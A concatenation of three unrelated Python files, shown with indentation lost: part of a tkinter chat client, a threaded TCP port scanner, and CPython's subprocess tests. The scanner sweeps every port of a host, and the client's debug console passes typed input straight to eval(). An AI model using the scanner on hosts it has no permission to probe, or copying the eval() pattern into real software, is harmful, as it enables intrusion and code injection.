self.frame_bot.rowconfigure(0, weight=0)
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
# Update checker
if '--disable-updater' not in sys.argv:
self.HM_Root.add_command(label='', state=tk.DISABLED)
self.update_checker = h_cl.UpdateChecker(self.HM_Root)
Thread(target=self.update_checker.check, daemon=True).start()
def init_messenger(self):
self.messenger = MessengerClient(self)
self.messenger.register_user()
def show_message(self, text: str):
""" Will show the message in chat ui """
text = text + '\n'
self.chat_messages.config(state=tk.NORMAL)
self.chat_messages.insert(tk.END, text)
self.chat_messages.config(state=tk.DISABLED)
self.chat_messages.see(tk.END)
def send_message(self, *args):
message = self.chat_message_input.get()
self.chat_message_input.delete(0, tk.END)
if len(message) > 0:
self.messenger.send_message(message)
def refresh_color_scheme(self, screen=0, refreshAll=False):
"""
Will refresh color theme from json config file
Keyword Arguments:
screen {int} -- Select screen to refresh colors. 0 - Root, 1 - Settings (default: {0})
refreshAll {bool} -- Will refresh theme on all screens (default: {False})
"""
if refreshAll:
for i in range(2):
self.refresh_color_scheme(screen=i)
return 0
cfg = h.VMConfig.get(1)
if len(cfg) > 0:
theme_name = 'theme_' + cfg['ui']['theme_selected']
selected_theme = cfg['ui']['root'][theme_name]
if screen == 0:
def _update_theme_from_dict(theme: dict):
self.frame_top.config(bg=theme['frame_bg'])
self.chat_messages.config(bg=theme['chat_bg'], fg=theme['text'])
self.frame_bot.config(bg=theme['chat_bg'])
self.chat_message_input.config(bg=theme['message_input_bg'], fg=theme['text'])
self.chat_btn_send_message.config(bg=theme['buttond_send_bg'], fg=theme['buttond_send_fg'])
# Font update
self.chat_messages.config(font=cfg['ui']['root']['font'])
self.chat_message_input.config(font=cfg['ui']['root']['font'])
# Theme update
_update_theme_from_dict(selected_theme)
if screen == 1:
pass # TODO: Implement theme refreshing for settings window
if theme_name == 'theme_light':
self.HM_Theme.entryconfig(0, state=tk.DISABLED)
self.HM_Theme.entryconfig(1, state=tk.NORMAL)
elif theme_name == 'theme_dark':
self.HM_Theme.entryconfig(1, state=tk.DISABLED)
self.HM_Theme.entryconfig(0, state=tk.NORMAL)
else:
h.create_log('Cant refresh color theme - config file was not found -> Building config from built-in values and trying again')
h.VMConfig.init(1)
self.refresh_color_scheme(screen, refreshAll)
def set_color_scheme(self, mode: int):
"""
Set color scheme to selected mode
Arguments:
mode {int} -- Theme type (0 - light, 1 - dark)
"""
cfg = h.VMConfig.get(1)
theme = 'light' if mode == 0 else 'dark'
cfg['ui']['theme_selected'] = theme
h.VMConfig.write(cfg, 1)
h.create_log(f'UI Theme set to {theme}')
self.refresh_color_scheme()
def show_window_settings(self):
""" Will show window with settings """
ENTRY_WIDTH = 40
window = tk.Toplevel(self.root)
h_cl.iconbitmap_universal(window)
window.title('Settings')
window.resizable(False, False)
window = tk.Frame(window)
window.grid(row=0, column=0, padx=5, pady=5)
# Username settings
def _reload_uname():
uname_currentLabel.config(text='Current username: ' + h.VMConfig.get(1)['username'])
def _setUname():
username = uname_input.get()
if len(username) > 0:
cfg = h.VMConfig.get(1)
cfg['username'] = username
h.VMConfig.write(cfg, 1)
_reload_uname()
else:
uname_input.delete(0, tk.END)
uname_input.insert(0, "Username can't be empty!")
frame_setUsername = tk.LabelFrame(window, text='Username')
uname_currentLabel = tk.Label(frame_setUsername, text='')
_reload_uname()
uname_input = tk.Entry(frame_setUsername, width=ENTRY_WIDTH)
uname_btn_set = tk.Button(frame_setUsername, text='Set', command=_setUname, height=1, relief=tk.FLAT, bg='#dfdfdf')
frame_setUsername.grid(row=0, column=0, sticky='NSEW')
uname_currentLabel.grid(row=0, column=0, sticky='W')
uname_input.grid(row=1, column=0, sticky='W')
uname_btn_set.grid(row=1, column=1, sticky='EW')
# Advanced
def _reset_cfg():
h.VMConfig.reset(1)
_reload_uname()
_hide_enc_key()
self.refresh_color_scheme(refreshAll=True)
h.create_log('Config file reset complete')
frame_advanced = tk.LabelFrame(window, text='Advanced')
adv_btn_resetConfig = tk.Button(frame_advanced, text='Reset To Defaults', command=_reset_cfg, height=1, relief=tk.FLAT, bg='#dfdfdf')
frame_advanced.grid(row=0, column=1, sticky='NSEW', rowspan=10)
adv_btn_resetConfig.grid(row=0, column=1, sticky='EW', padx=2)
# Encryption settings
def _set_enc_key():
key = ekey_input_field.get()
VMCrypt.set_key(key)
_hide_enc_key()
ekey_warning_label.config(text='Key was successfully set', fg='#009f00')
def _show_enc_key():
ekey_currentKey_label.config(text=f'Current Key: {h.VMConfig.get(1)["aes_key"]}')
def _hide_enc_key():
ekey_currentKey_label.config(text='Current Key: ****')
frame_encKeySettings = tk.LabelFrame(window, text='Encryption Key')
ekey_warning_label = tk.Label(frame_encKeySettings, text='')
ekey_currentKey_label = tk.Label(frame_encKeySettings, text='Current Key: ****', bg='#ffffff')
ekey_btn_showCurrentKey = tk.Button(frame_encKeySettings, text='Show', command=_show_enc_key, height=1, relief=tk.FLAT, bg='#dfdfdf')
ekey_input_field = tk.Entry(frame_encKeySettings, width=ENTRY_WIDTH)
ekey_btn_set = tk.Button(frame_encKeySettings, text='Set', command=_set_enc_key, relief=tk.FLAT, bg='#dfdfdf')
frame_encKeySettings.grid(row=1, column=0, sticky='NSEW')
ekey_warning_label.grid(row=0, column=0, sticky='W')
ekey_currentKey_label.grid(row=1, column=0, sticky='EW')
ekey_btn_showCurrentKey.grid(row=1, column=1, sticky='EW')
ekey_input_field.grid(row=2, column=0, sticky='E')
ekey_btn_set.grid(row=2, column=1, sticky='EW')
# Refresh theme
# self.refresh_color_scheme(1) # TODO: Finish screen
def show_debug_console(self):
"""
Show in-app console with actions logs.
"""
if hasattr(self, 'debug_console_showing'): return False
def _handleConsoleInput(e):
input_str: str = self.__debug_console_input.get()
if input_str == 'clear':
self.__debug_console_output.config(state=tk.NORMAL)
self.__debug_console_output.delete(1.0, tk.END)
self.__debug_console_output.config(state=tk.DISABLED)
elif input_str == 'clear-chat':
self.chat_messages.config(state=tk.NORMAL)
self.chat_messages.delete(1.0, tk.END)
self.chat_messages.config(state=tk.DISABLED)
elif input_str == 'refresh-theme': self.refresh_color_scheme()
elif input_str == 'polling-stop': self.messenger.stop_message_polling()
elif input_str == 'test-raise': raise Exception('Test exception raised')
elif input_str == 'version': h.create_log(f'Version: {h.VERSION}')
elif input_str == 'updates-check': self.update_checker.check()
elif input_str.startswith('eval'): eval(input_str[5:])
else: h.create_log('No such command')
self.__debug_console_input.delete(0, tk.END)
def _on_close(window, obj):
delattr(obj, 'debug_console_showing')
obj.HM_Advanced.entryconfig(0, state=tk.NORMAL)
std_redirect.disable()
window.destroy()
ui_window = tk.Toplevel(bg='#181818')
ui_window.geometry('700x300')
ui_window.title('Debug Console')
ui_window.protocol('WM_DELETE_WINDOW', lambda: _on_close(ui_window, self))
ui_window.columnconfigure(0, weight=1)
ui_window.rowconfigure(0, weight=1)
# Top
self.__debug_console_FTop = tk.Frame(ui_window)
self.__debug_console_FTop.columnconfigure(0, weight=1)
self.__debug_console_FTop.rowconfigure(0, weight=1)
self.__debug_console_output = tk.Text(self.__debug_console_FTop, bg='#262626', fg='white', font=h.VMConfig.get(1)['ui']['debug_console']['font'], state=tk.DISABLED)
self.__debug_console_scrollbar = tk.Scrollbar(self.__debug_console_FTop, command=self.__debug_console_output.yview)
self.__debug_console_output.config(yscrollcommand=self.__debug_console_scrollbar.set)
self.__debug_console_FTop.grid(column=0, row=0, sticky="NSEW")
self.__debug_console_output.grid(column=0, row=0, sticky="NSEW")
self.__debug_console_scrollbar.grid(column=1, row=0, sticky="NS")
# Bottom
self.__debug_console_FBot = tk.Frame(ui_window)
self.__debug_console_FBot.columnconfigure(0, weight=1)
self.__debug_console_FBot.rowconfigure(0, weight=1)
self.__debug_console_input = tk.Entry(self.__debug_console_FBot, bg='#303030', fg='#00fa00', font='Consolas 10')
self.__debug_console_input.bind('<Return>', _handleConsoleInput)
self.__debug_console_FBot.grid(column=0, row=1, sticky="NSEW")
self.__debug_console_input.grid(column=0, row=0, sticky="EW")
self.HM_Advanced.entryconfig(0, state=tk.DISABLED)
self.debug_console_showing = True
# Redirect STD (-OUT && -ERROR) to debug console
std_redirect = h_cl.RedirectSTD(self.__debug_console_output)
def startup():
ui_root = tk.Tk()
ui_root.title(h.APPDICT['client']['title'])
h_cl.iconbitmap_universal(ui_root)
ui_root.minsize(width=100, height=100)
mainWindow = VM_MainWindow(ui_root)
h.VMConfig.init(1)
mainWindow.refresh_color_scheme()
mainWindow.init_messenger()
ui_root.mainloop()
def run_source():
""" Startup from source code with poetry """
os.chdir(os.path.dirname(__file__))
startup()
if __name__ == '__main__':
""" Built app startup """
os.chdir(os.path.abspath('.'))
startup()
|
portscanner.py
|
import threading
import socket
import time
import sys
class PortScanner:
__returned_values = []
def __init__(self,host):
self.host = host
def scan(self,port_number):
temp_buffer = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
port_status = s.connect_ex((self.host,port_number))
except ConnectionRefusedError:
print("No connection could be made because the target machine actively refused it.")
else:
if port_status == 0:
self.__returned_values.append(port_number)
s.close()
return self.__returned_values
def scan_port(self,port_number):
temp_buffer = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
port_status = s.connect_ex((self.host,port_number))
except ConnectionRefusedError:
print("No connection could be made because the target machine actively refused it.")
else:
if port_status == 0:
self.__returned_values.append(port_number)
s.close()
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
def scan_range(self,first,last):
temp_buffer = []
for i in range(first,last):
t = threading.Thread(target=self.scan,kwargs={'port_number':i})
t.start()
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
#it takes approximately 10 seconds
def scan_all(self):
temp_buffer = []
for i in range(1,65536):
t = threading.Thread(target=self.scan,kwargs={'port_number':i})
t.start()
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
#just for console usage
def scan_all_for_console(self):
temp_buffer = []
for i in range(1,65536):
t = threading.Thread(target=self.scan,kwargs={'port_number':i})
t.start()
sys.stdout.write("\r(%d/65535) ports scanned" % i)
sys.stdout.flush()
print("\n")
temp_buffer = self.__returned_values
self.__returned_values = []
return temp_buffer
|
test_subprocess.py
|
import unittest
from test import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import selectors
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(FileNotFoundError, self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
original_cwd = os.getcwd()
os.chdir(cwd)
cwd = os.getcwd()
os.chdir(original_cwd)
return cwd
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with script_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
